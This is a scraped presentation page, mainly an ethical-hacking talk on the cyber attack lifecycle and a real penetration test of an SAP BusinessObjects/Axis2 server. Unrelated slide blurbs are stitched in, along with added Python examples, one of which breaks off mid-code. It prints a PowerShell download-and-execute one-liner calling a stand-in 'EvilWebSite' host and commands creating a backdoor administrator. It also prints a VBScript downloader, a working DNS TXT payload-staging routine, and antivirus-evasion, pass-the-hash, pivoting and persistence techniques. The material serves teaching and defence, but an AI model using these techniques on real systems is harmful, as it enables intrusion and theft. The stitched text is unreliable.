In this scenario an attacker conducts a penetration test against a target organization. They first find vulnerabilities in the organization's SAP BO deployment, including default credentials and directory traversal issues, which allow them to upload a backdoored web service. This gives them code execution on a web server. To extend their access, the attacker creates a privileged temporary account and establishes a reverse SSH tunnel that bypasses blocked ports and reaches systems on the internal network.
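As an added, defender-side illustration (my example, not code from the presentation): the directory traversal issue that opens the scenario leaves a trace in the web server's access log. The Python below parses constructed sample log lines, percent-decodes each request path (including double-encoded forms), treats backslashes as separators, and flags only paths that actually climb above the web root, so a benign `/docs/../index.html` is not reported. The hosts, timestamps and the `/webapp/` prefix are placeholders and are not SAP BO paths.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines in the common web-server log format.
# Hosts, paths and timestamps are made up for this example; they are not taken
# from the presentation or from any real SAP BusinessObjects deployment.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2016:10:01:02 +0100] "GET /webapp/logon.jsp HTTP/1.1" 200 5120
10.0.0.5 - - [12/Dec/2016:10:01:09 +0100] "GET /webapp/..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1873
10.0.0.5 - - [12/Dec/2016:10:02:11 +0100] "GET /webapp/..%252f..%252fWEB-INF/web.xml HTTP/1.1" 200 940
10.0.0.7 - - [12/Dec/2016:10:03:40 +0100] "GET /webapp/docs/../index.html HTTP/1.1" 200 2048
10.0.0.9 - - [12/Dec/2016:10:04:02 +0100] "GET /webapp/..\\..\\win.ini HTTP/1.1" 404 310
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded sequences such as %252e%252e are seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_root(path):
    """True if the request path, once decoded and normalised, climbs above
    the web root. Only '..' segments that take the depth below zero count,
    so '/docs/../index.html' stays inside the root and is not flagged."""
    path = path.split("?", 1)[0]                  # ignore the query string
    path = decode_fully(path).replace("\\", "/")  # backslash acts as a separator
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_log(text):
    """Return one finding per request whose path escapes the web root.
    'served' marks responses below 400, which deserve the most urgent
    follow-up because the server may actually have returned the file."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match or not escapes_root(match["path"]):
            continue
        status = int(match["status"])
        findings.append({
            "src": match["src"],
            "time": match["ts"],
            "path": match["path"],
            "decoded": decode_fully(match["path"]),
            "status": status,
            "served": status < 400,
        })
    return findings


def by_source(findings):
    """Count traversal attempts per client address to surface the noisiest source."""
    return Counter(f["src"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        flag = "SERVED" if hit["served"] else "blocked"
        print(f'{hit["time"]} {hit["src"]} {flag} {hit["path"]} -> {hit["decoded"]}')
    print("attempts per source:", dict(by_source(hits)))
```

Running it on the sample reports three requests from two sources; the two that were answered with 200 are the ones to investigate first, since a served traversal means the application disclosed a file outside its root. The default-credential part of the scenario is a separate control (audit the product's logon events for built-in account names) and is not covered by this log check.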
The Cyber Attack landscape is evolving with new attack vectors and dangerous trends that can affect the security of your business. Some attacks can take only minutes to complete, yet months to be discovered.
Determine your attack risk and learn what to look for in a quality cyber attack defense.
Please visit http://www.radware.com/social/amn/ for information on Radware's AMN (Attack Mitigation Network).
What are cyber attacks?
In simple terms, cyber attacks are attempts to disable other computers, or to steal information from them, by gaining administrative privileges on them.
Why should businesses be worried?
An average ransomware attack costs a company $5 million. Attackers target all types of businesses, small and large, in healthcare, banking and finance, manufacturing, education and even government. The internet has made life a lot easier for business owners; at the same time it has made them easier to hack.
IBM redefines its strategy and approach to Advanced Persistent Threa... - Luigi Delgrosso
Recorded webinar at http://event.on24.com/wcc/r/1117340/BECF92C8BBDF5B51399A8FB934C97054
This webinar was held in Italian by Luigi Delgrosso and Fabrizio Patriarca.
Please contact them for additional details and to arrange an on-site visit.
Security Attack Analysis for Finding and Stopping Network Attacks - Savvius, Inc
Network breaches are on the rise, and the consequences are getting more dire. Needless to say, you don't want to be the next Target. You've invested in security tools like firewalls and IPS systems, but today's stealthy attacks can still get through. When you suspect an attack, you need your insurance policy: network forensics.
In this seminar, you'll learn how network forensics (network recording along with powerful search and analysis tools) can enable your in-house security team to track down, verify, and characterize attacks.
You'll also learn about the requirements for effective forensics on today's 10G and 40G networks.
And you'll learn some best practices for configuring captures to help you and your team pinpoint and remediate anomalous behavior that could signal an attack.
Cambodia CERT Seminar: Incident response for ransomware attacks - APNIC
Senior Security Specialist Adli Wahid presents on incident response for ransomware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Sophisticated Attacks vs. Advanced Persistent Security - Priyanka Aash
It appears that any successful attack these days is labeled "sophisticated". The implication is that the attacks were unpreventable. The reality is very different. We dissect recent attacks, and then go through how they could have been prevented. Advanced Persistent Security principles are applied to demonstrate how even successful breaches can be contained to significantly reduce loss.
(Source: RSA USA 2016-San Francisco)
Covers: what cyber security is; types of cyber attacks (web-based and system-based); injection attacks, cross-site scripting, DNS spoofing, denial-of-service and brute-force attacks; viruses, worms and Trojan horses.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
WannaCry Ransomware Attack: What to Do Now - IBM Security
View on-demand webinar: http://bit.ly/2qoNQ8v
What you need to know and how to protect against the WannaCry ransomware attack, the largest coordinated cyberattack of its kind. WannaCry has already crippled critical infrastructure and multiple hospitals and telecommunications organizations, infecting hundreds of thousands of endpoints in over 100 countries. In this on-demand webinar, we discuss the anatomy of this unprecedented attack and IBM researchers share expert insights into what you can do now to protect your organization from this attack and the next one.
IT security in 2021: Why Ransomware Is Still The Biggest Threat - ETech 7
What’s next for cybersecurity in 2021? Last year, both the public and the private sector experienced a plethora of breaches and attacks. From regular security lapses to more complicated, and often more expensive, ransomware attacks - 2020 has seen a drastic increase in the volume of breaches that led to the widespread loss of data and valuable information around the world.
The CEH v11 program provides an in-depth understanding of ethical hacking phases, various attack vectors, and preventative countermeasures. It will teach you how hackers think and act maliciously so that you will be better positioned to set up your security infrastructure and defend against future attacks.
Zero-Day Vulnerability and Heuristic Analysis - Ahmed Banafa
A zero-day vulnerability refers to a hole in software that is unknown to the vendor. This security hole is then exploited by hackers before the vendor becomes aware of it and fixes it. Zero-day attacks can be used to infiltrate malware or spyware, or to gain unwanted access to user information.
The term “zero day” refers to the unknown nature of the hole to those outside of the hackers, specifically, the developers. Once the vulnerability becomes known, a race begins for the developer, who must protect users.
As the number and severity of cyber-crimes continues to grow, it's important to understand the steps cyber-criminals take to attack your network, the types of malware they use, and the tools you need to stop them. The basic steps of a cyber attack include reconnaissance (finding vulnerabilities); intrusion (actual penetration of the network); malware insertion (secretly leaving code behind); and clean-up (covering tracks).
Malware comes in various forms, some more nefarious than others, ranging from annoying sales pitches to potentially business-devastating assaults. Dell SonicWALL offers comprehensive solutions to counter every stage of cyber attacks and eliminate every type of malware from disrupting your business network.
The course gives a professional and academic introduction to computer and information security using the ethical hacking approach. Adopting an attacker mindset when discovering vulnerabilities enables improved defence, and hands-on experience with different attacks links theory and practice in significant areas of one's digital literacy. The course can therefore be used by (future) security professionals, (informed) decision-makers, (savvy) users and developers alike.
Looking to understand how hackers and other attackers use cyber technology to attack your network and your executives? This slide set provides an overview and details the anatomy of a cyber attack, and the strategies you can use to manage and mitigate risk.
In this presentation I give an overview of different kinds of cyber attacks and crimes, including email fraud and fake mails (how they are created and how to prevent them), and of the different types of software used for spying.
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack - Aujas
It is a given that you will be hacked, irrespective of your level of cyber security. Learn how you can detect, respond and recover from cyber attacks, quicker.
Key Content:
1. The threat landscape and how existing monitoring and response capabilities are ineffective in detecting and responding to advanced cyber attacks
2. Lifecycle and speed of an attack and how early detection can help in responding and managing losses
3. Blueprint for an effective (and vendor agnostic) Incident Management Program
If you have been tracking the cyber security news lately, one thing is for sure: cyber attacks are imminent, and it is only a matter of time before you are the next one to come under attack, if you have not been already.
What Robert Mueller, former Director of the FBI, said at the RSA Conference in March 2012 is still very relevant:
"I am convinced that there are only two types of companies: those that have been hacked and those that will be." And what he says next makes it worse: "And even they are converging into one category: companies that have been hacked and will be hacked again."
Cyber attacks are no longer the work of lone warriors or a group of hackers; they involve cyber crime syndicates that collaborate and invest large amounts of money, precision, knowledge, expertise and persistence. Their capabilities are equal to, if not better than, those of state sponsors.
Data shows that cyber security incidents affect all kinds of organizations, small, medium or large, and across all industries: financial, telecom, utility, health care, education and more. Organizations fail to detect and respond to security incidents due to weak monitoring capabilities and a lack of expertise, tools and procedures.
In this webinar we will look at the cause and effect of the problem, analyze preparedness and learn how you can better prepare, detect, respond and recover from cyber attacks.
The term 'Cyberspace' encapsulates fascinating technologies such as 3D displays, Augmented Reality and Virtual Reality, as well as simply surfing the web. Therefore Cyberspace is a relevant concept to almost everyone even today.
• Why are we attracted to Cyberspace?
• The moral issues and aspects faced in Cyberspace
• Hierarchies of realities and Plato's concept of 'Ideas'
• René Descartes and scepticism: can we differentiate between realities?
• Are we faced with the worst drugs ever known to mankind?
Introduction to cyber security by Cyber Security Infotech (CSI). Keywords: Information Security, website development company, Employee Monitoring System, Employee Monitoring Software.
Media Technology and Society - Cyber Society - Faindra Jabbar
Media Technology and Society
Topic: Cyber Society
Cyberspace
Cyber Society
Positive impact of Cyberspace
Negative impact of Cyberspace
Social Media
Web 2.0
This presentation gives a brief idea of how coalition politics is a major driving force behind corruption. It contains facts, graphics, history, etc. about the same. Most of the aspects are presented in the context of India.
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading - Muhammad FAHAD
The "cyber kill chain" is a sequence of stages required for an attacker to successfully infiltrate a network and exfiltrate data from it. Each stage demonstrates a specific goal along the attacker's path. Designing your monitoring and response plan around the cyber kill chain model is an effective method because it focuses on how actual attacks happen.
The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field.
https://www.infosectrain.com/courses/certified-ethical-hacker-ceh-training/
The EC-Council’s Certified Ethical Hacker (CEH v12) Training program will enhance your knowledge of essential security fundamentals. Certified Ethical Hacker (CEH V12) certification course is one of the most sought-after security qualifications in the world. This internationally recognized security course validates your ability to discover weaknesses in the organization’s network infrastructure and aids in the effective combat of cyber-attacks.
This is an introductory course that is developed with the objective of laying the foundation stone which can potentially transform into a career in the cyber security space....
PowerPoint Presentation On Ethical Hacking in Brief (Simple) - Shivam Sahu
PowerPoint presentation on Ethical Hacking in brief (simple). Easy to understand for all MCA, BCA, BTech, MTech and other students who want a good PowerPoint or seminar presentation on Ethical Hacking.
This is a presentation I gave to senior high school students. The first part is an overview; the second part is more detailed on the ways to perform Ethical Hacking.
Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends in web-based malware. Technology and insecurity go hand in hand. With the advent of new attacks and techniques, the distribution of malware through the web has increased tremendously. Browser-based exploits, mainly against Internet Explorer, have given birth to a new world of malware infection. Attackers spread malware elegantly by exploiting vulnerabilities and drive-by downloads; their infection strategies include malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of this web-based malware, a thorough analysis is required to understand the logic working behind it. It is necessary to dissect this malware from bottom to top in order to control its devastating behavior. The talk covers structured methodologies and demonstrates the static, dynamic and behavioral analysis of web malware, including PCAP analytics. Demonstrations show the necessity of web malware analysis.
Introduction to Ethical Hacking; life cycle of hacking; introduction to penetration testing; steps in penetration testing; footprinting module; scanning module; live demos on finding vulnerabilities: a) bypass authentication, b) SQL injection, c) cross-site scripting, d) file upload vulnerability (web server hacking); countermeasures for securing web applications.
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - December 2016
2. Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion
4. Objectives
• Get insights into the methodologies used during a cyber attack
• Understand how hackers penetrate a network, elevate their privileges, maintain persistence and hide their malicious activities
• Show hands-on: provide a concrete example using the Metasploit tool; show a demo in real time; deep dive into a real-life pentesting exercise
• Understand what can be done to protect against cyber attacks
6. Introduction
Frédéric De Pauw
Co-Founder / Offensive Security @Avanguard
Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw
7. Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that involves a
computer and a network
Two types of cyber crime:
Technology is the target: enterprise, state or personal systems
Technology is the instrument: criminal activities on the Internet
This session is focused on the first type
8. Introduction
Technology = Target:
• Distributed Denial of Service
• Hacking
• Malware, Ransomware
• Phishing
• Hacktivism
• …
Technology = Instrument:
• Child pornography
• Incitement to racial hatred
• Incitement to terrorism
• Money laundering
• Drug sales
• Spam
• …
9. Introduction Cyber Crime
Drastically evolved over the past years, following the global evolution of ICT supporting human activity
Allows cyber criminals to make profits equivalent to other types of criminality
Offers some advantages over other criminal activities: anonymity, discretion, no borders
Remains little fought, with no international legislation
Has evolved into cyber war with state-sponsored attacks
Will affect our lives (connected cars, Operational Technologies, IoT)
Cost of cyber crime in Belgium: 3.5 billion Euros
10. Introduction
• Evolution of Cyber Crime (figure: sophistication rising over time, from 1985-1995 to 2010-2016-…)
Stages shown on the timeline, in order of increasing sophistication: Entertainment, First Worms, Phone Hacking, Hacktivism, Virus Spread, Website Defacement, Organized Crime, DDoS, Company Systems Hacking, Data Leak, Industrial Espionage, Cyber War, Targeted Attacks, State-Sponsored Attacks
11. Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)
Predominance of Advanced Persistent Threats targeting the end user
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and operational technologies
Hacking of a plane - 2015
Hacking of a pacemaker - 2013
Car hacking - 2015
12. Introduction
Legal evolution
General Data Protection Regulation (GDPR) – adopted in 2016 – comes into force 25 May 2018
Circulars of the National Bank of Belgium
Regulation for the financial sector
Data breach notification standard
Within 72 hours
Fines in case of a data leak
Up to 4% of worldwide annual turnover or 20 M€, whichever is higher
14. Cyber Attack Lifecycle
1 Reconnaissance: public information, social networks, vulnerability scanning, physical observation
2 Initial Infection: vulnerabilities, virus / malware, social engineering, physical intrusion
3 Gain Control: control the infected system
4 Privilege Escalation: gain elevated privileges on the infected system
5 Lateral Movement: compromise more systems deeper in the network
6 Persistence: maintain a persistent connection with infected systems
7 Malicious Activities: data exfiltration, hacking websites, money extortion
15. Cyber Attack Lifecycle
> Reconnaissance
The reconnaissance process is a key activity
Indeed, during this phase crucial information is obtained in order to perform a cyber attack
For instance, the information will be used to determine the best attack vector to be used
Activities performed are:
Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information
Collect information through direct contact such as phone calls (fake poll, job seeker..)
Collect technical information concerning the target information system (exposed systems, partners, data centers..)
Collect information on premises (garbage, WiFi scanning..)
Actively scan enterprise networks exposed on the Internet
18. Cyber Attack Lifecycle
> Reconnaissance
Following reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase
For instance:
Vulnerabilities affecting systems exposed on the Internet
Weak physical access control to facilities
Social engineering attack on selected profiles, chosen for instance from social network information
19. Cyber Attack Lifecycle
> Initial Infection
Initial Infection is aimed at obtaining a first backdoor within the target
information system
Vectors:
Exploiting a vulnerability affecting the victim’s system(s)
Infection through Virus / Malware
Exploiting a physical vulnerability
Installing rogue access points or devices
22. Cyber Attack Lifecycle
> Initial Infection
IDS/IPS Bypass
Encryption of the C&C channel
Anti-Virus Bypass
Use a simple PowerShell one-liner as a dropper which fetches an encrypted payload over the Internet and runs it from memory:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
Unknown (custom) viruses for which no signature exists yet
Use staging to decouple the payload from the initial dropper: the dropper only fetches the stage, which is loaded directly into memory and never written to disk
Firewall Bypass
Use « reverse » connections, from the victim out to the C&C
E.g. HTTPS passing through the enterprise proxy
23. Cyber Attack Lifecycle
> Initial Infection
Free tool for malware code obfuscation: VEIL Evasion Framework
Generates obfuscated payloads using several methodologies
Wraps Metasploit Meterpreter payloads
Generates payloads from different sources:
C/C++ shellcode
PowerShell shellcode
Python shellcode
24. Cyber Attack Lifecycle
> Initial Infection
Metasploit + Veil framework
Create a Meterpreter backdoor obfuscated with VEIL (PowerShell type)
25. Cyber Attack Lifecycle
> Initial Infection
Metasploit + VEIL Framework
Create a Meterpreter backdoor using VEIL for antivirus evasion
Embed the virus in a Word macro, or create a .bat that either includes the payload or fetches it from a web server
27. Cyber Attack Lifecycle
> Initial Infection
Start the Listener on Metasploit
More during the Demo
28. Cyber Attack Lifecycle
> Gain Control
Once the initial infection is done, the objective is to get control over the machine.
For this a network connection must be established between the victim and the Command & Control server
In general a « reverse » connection (from the victim to the C&C) is made to bypass inbound firewall protection
Several techniques exist to bypass outbound filtering (if present)
29. Cyber Attack Lifecycle
> Gain Control
Standard enterprise security principles for outbound filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol (real HTTP on port 80, not a raw shell)
Outbound connections must pass other checks as well (proxy authentication, for instance)
Outbound filtering evasion techniques, examples:
Reverse HTTP and / or HTTPS traffic (with or without honouring the enterprise proxy settings)
Payload staging over DNS, by placing the payload in the TXT records of a domain the attacker controls: only the internal resolver talks to the Internet, so the proxy never sees the stage
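Added worked example (Python, written for this page, not part of the original deck): it models the DNS TXT staging technique above from both sides and shows what the defender is left with. The zone name stage.example.net, the 189-byte chunk size, the record layout (record 0 = chunk count and SHA-256, records 1..n = base64 chunks) and the RecordingResolver standing in for the corporate DNS resolver are all assumptions of this example; the stage itself is 768 constructed pseudo-random bytes, not shellcode.

```python
import base64
import hashlib
import math
from collections import defaultdict

# Constructed stand-in for a second stage (768 pseudo-random bytes); a real stager would pull shellcode.
STAGE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(24))
# 189 raw bytes base64-encode to 252 characters, which fits in one 255-byte TXT character-string.
CHUNK = 189
ZONE = "stage.example.net"  # hypothetical attacker-controlled zone


def build_txt_zone(payload: bytes, zone: str) -> dict:
    """Attacker side: split the payload into numbered TXT records.
    Record 0 carries the chunk count and a SHA-256 so the stager can verify reassembly."""
    chunks = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)]
    records = {f"0.{zone}": f"n={len(chunks)};sha256={hashlib.sha256(payload).hexdigest()}"}
    for i, chunk in enumerate(chunks, start=1):
        records[f"{i}.{zone}"] = base64.b64encode(chunk).decode("ascii")
    return records


class RecordingResolver:
    """Stand-in for the corporate DNS resolver; keeps the query/answer log a defender would have.
    The victim never talks to the Internet itself: the resolver does, so the web proxy sees nothing."""

    def __init__(self, zone_data: dict):
        self.zone_data = zone_data
        self.log = []  # (qname, answer)

    def txt(self, qname: str) -> str:
        answer = self.zone_data[qname]
        self.log.append((qname, answer))
        return answer


def fetch_stage(resolver: RecordingResolver, zone: str) -> bytes:
    """Stager side: read record 0, walk the numbered records, reassemble and verify the digest."""
    header = dict(kv.split("=", 1) for kv in resolver.txt(f"0.{zone}").split(";"))
    data = b"".join(base64.b64decode(resolver.txt(f"{i}.{zone}"))
                    for i in range(1, int(header["n"]) + 1))
    if hashlib.sha256(data).hexdigest() != header["sha256"]:
        raise ValueError("stage integrity check failed")
    return data


def shannon_entropy(text: str) -> float:
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def flag_txt_staging(log, min_answers=3, min_len=100, min_entropy=5.0) -> dict:
    """Defender side: group TXT answers by parent zone (crudely: drop the first label) and flag zones
    that returned several long, high-entropy answers. SPF/DKIM/DMARC records are few and low-entropy."""
    per_zone = defaultdict(list)
    for qname, answer in log:
        per_zone[qname.split(".", 1)[1]].append(answer)
    flagged = {}
    for zone, answers in per_zone.items():
        suspicious = [a for a in answers if len(a) >= min_len and shannon_entropy(a) >= min_entropy]
        if len(suspicious) >= min_answers:
            flagged[zone] = {"queries": len(answers), "bytes": sum(len(a) for a in suspicious)}
    return flagged


if __name__ == "__main__":
    zone = build_txt_zone(STAGE, ZONE)
    zone["_dmarc.example.com"] = "v=DMARC1; p=reject"  # constructed benign record for contrast
    resolver = RecordingResolver(zone)
    resolver.txt("_dmarc.example.com")
    assert fetch_stage(resolver, ZONE) == STAGE
    print(flag_txt_staging(resolver.log))
```

Running it prints the staging zone with its query count and byte volume; the benign _dmarc record is not flagged. The defensive point is the one the slide implies: because only the internal resolver contacts the Internet, the proxy never sees the stage, so TXT answer length and entropy per zone have to be watched on the resolver's own logs.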
30. Cyber Attack Lifecycle
> Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload that
uses in-memory DLL injection stagers and is extended over the
network at runtime. It communicates over the stager socket and
provides a comprehensive client-side Ruby API. It features
command history, tab completion, channels, and more.
31. Cyber Attack Lifecycle
> Privilege Escalation
Escalate privileges from infected machines in order to gain elevated access
Typical example is getting Administrator or SYSTEM privileges
Several techniques:
« Local Exploits » against applications or the OS on the infected machine
Manual search for credentials in scripts and configuration files
Password hash dump (e.g. SAM, /etc/shadow) and cracking
Authenticated session grabbing (e.g. VPN sessions)
SSH keys
World-writable files
Reading command history files
Batches / jobs alteration
Process injection
Try injecting malicious code in processes running under a privileged user, e.g. « Domain Admin »
32. Cyber Attack Lifecycle
> Privilege Escalation
Metasploit: « Incognito » module
Allows impersonating authentication tokens on compromised Windows hosts
The backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens
TIP: file servers are virtual treasure troves of tokens, since most file servers are used as network-attached drives via domain logon scripts
33. Cyber Attack Lifecycle
> Lateral Movement
From infected systems, try to infect more systems deeper in the network
Basically repeat the cyber attack lifecycle process (recon, initial infection, privilege escalation…)
Aim for high-value systems: Windows domain controllers, file servers..
Techniques
Credential re-use / pass-the-hash / SSH key re-use
Internal application vulnerabilities (internal systems are less often patched)
Network segmentation issues between environments (e.g. port 445 open between zones) – PsExec with Pass-The-Hash
34. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow and even aid in the
compromise of other otherwise inaccessible systems
35. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Use Autoroute to make the compromised host a pivot to other
networks
36. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Scan the network through the route created on ports 139 & 445
37. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Start a new session on a new host using PsExec and the “Pass-The-Hash” technique, re-using the local Administrator password hash
38. Cyber Attack Lifecycle
> Maintain Persistence
Prevent loss of connection between infected machines and the C&C
Techniques
Create jobs / schedule tasks
Create service running on startup
Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
Bootkit / Rootkit
Default file association
Logon Scripts
Modification of Applications / Services
Registry RUN keys
39. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
41. Cyber Attack Lifecycle
> Demo
Social Engineering scenario
Send a « virus » to the victim which consists of a Metasploit Meterpreter instance
Undetected by up-to-date commercial antivirus
1. Prepare malware & environment
2. Send malware
3. Execute malware
4. Get infected & contact C&C
5. Interact
43. Vulnerabilities and Exploitation
A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
Simple example: default password. Complex example: buffer overflow in an application
Dozens of new vulnerabilities are officially classified every day
http://www.cvedetails.com
Dozens of others are not disclosed!
0DAY – a vulnerability not yet known to the vendor, or not yet disclosed, so no patch exists
Vulnerabilities are discovered by
Researchers, students (ethical hackers)
Professional researchers (vulnerability brokers)
http://www.zerodayinitiative.com/
France – Vupen Security – sells vulnerabilities to government agencies such as the NSA
Cyber criminals (0DAYs)
44. Vulnerabilities and Exploitation
Full disclosure principle
Vulnerabilities are reported and published publicly as soon as they are discovered, whether or not a patch is available
Responsible disclosure principle
Vendors are notified first
The vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground websites on the TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)
46. Vulnerabilities and Exploitation
Why vulnerabilities keep appearing:
Complexity of systems, application code, communication flows, network segmentation
Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration
Next->Next->Next syndrome (installation with default settings)
Lack of secure coding awareness
OWASP Top 10
Lack of enforcement of security during IT projects
Security implies cost and time
Need for functionality <-> need for security
Protections left in blacklist mode or in learning mode
48. Penetration test example
• Context: Black Box intrusion test. Scope: external-facing systems
• (Diagram) Internet -> Web Servers (ports 80 HTTP and 443 HTTPS) in the DMZ -> Intranet: Enterprise Windows Domain, Internal Network
49. Penetration test example
• VULN 1/2: Vulnerable deployment of SAP BO (SAP BusinessObjects ships Apache Axis2)
• CVE-2010-0219, Apache Axis2 default credentials
• http://www.securityfocus.com/bid/40343, Apache Axis2 directory traversal
• See earlier:
• Vuln « Directory Traversal »
• Vuln « Default Password »
• Together they give admin credentials to the Axis2 console
51. Penetration test example
• Access to the Axis2 administration console allows uploading a web service and hot-deploying it (no restart needed)
52. Penetration test example
• A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse shell backdoor on the server, which connects back to the C&C server on port 80
• VULN 3: The server is allowed to contact any host on the Internet on ports 80 and 443
• (Diagram) Web Servers in the DMZ (ports 80 and 443) -> outbound on port 80 -> C&C SERVER – PORT 80; behind the DMZ: Intranet, Enterprise Windows Domain, Internal Network
53. Penetration test example
• Not possible to upload a meterpreter (killed by AV on the machine)
• Possible to upload a backdoor which sends me back a DOS
command prompt on the server
54. Penetration test example
• Next steps:
• Create a privileged account on the server
• VULN 4: Application server is running under ADMIN privileges
• net user temptest password /add
• net localgroup Administrators temptest /add
• Obtain a Remote Desktop connection
• Problem: port 3389 is closed inbound
• Solution: create a reverse SSH tunnel over port 443 with remote port-forwarding of port 3389
• (Diagram) Web Servers -> C&C SERVER – PORT 80; Web Servers -> SSH SERVER – PORT 443 (reverse SSH tunnel over port 443, forwarding port 3389)
55. Penetration test example
• To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt
• I create a VBScript downloader with the « echo » command (one echo per script line), then execute it:
• echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• cscript dl.vbs
• Use plink to create the tunnel
Full dl.vbs (c:\temp must exist before it runs):
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
.type = 1 '// binary
.open
.write xHttp.responseBody
.savetofile "c:\temp\plink.exe", 2 '// overwrite
end with
56. Penetration test example
(Diagram) Web Servers -> C&C SERVER – PORT 80; Web Servers -> SSH SERVER – PORT 443 (reverse SSH tunnel over port 443, forwarding port 3389)
Connect to RDP through the tunnel using the account I just created:
temptest / password
57. Penetration test example
Next step -> Lateral Movement – the simplest first: credential reuse
I need to crack all passwords present locally on the infected server
Vuln 6/7: Windows 2003 design vulnerabilities
VULN 6: the « repair » directory contains a SAM backup file holding the local password hashes, including LM hashes
VULN 7: the LM hash algorithm is broken (the password is upper-cased and split into two 7-character halves) and can be cracked easily
59. Penetration test example
VULN 8: Local Administrator password is replicated over all systems in the DMZ
(Diagram) same C&C and SSH tunnel as before; with the cracked local Administrator password, RDP (port 3389) to every other web server in the DMZ
60. Penetration test example
Next step: try to hit the internal network
VULN 9: DMZ systems are members of the internal Windows domain, which means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
VULN 10: Password replication bis – a Domain Admin account whose name is identical to a local account has the same password as that local account
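Added worked example (Python, written for this page, not from the original deck): an audit over pwdump-style hash dumps that surfaces the three conditions this engagement relied on (LM hashes stored, the same local Administrator hash on every DMZ host, and a domain account sharing a hash with a local one). The host names, the service accounts and their hashes are constructed; the LM and NT hashes of "password" are the well-known values; the line format user:rid:lm:nt::: is what pwdump-style tools and Metasploit's hashdump emit.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored (LM disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password (blank/disabled accounts)
# Well-known LM and NT hashes of "password"; every other hash below is a made-up placeholder.
LM_PASSWORD = "e52cac67419a9a224a3b108f3fa6cb6d"
NT_PASSWORD = "8846f7eaee8fb117ad06bdd830b7586c"

# Constructed pwdump-format dumps (user:rid:lm:nt:::) from three DMZ web servers and one domain controller.
DUMPS = {
    "web01": [f"Administrator:500:{LM_PASSWORD}:{NT_PASSWORD}:::",
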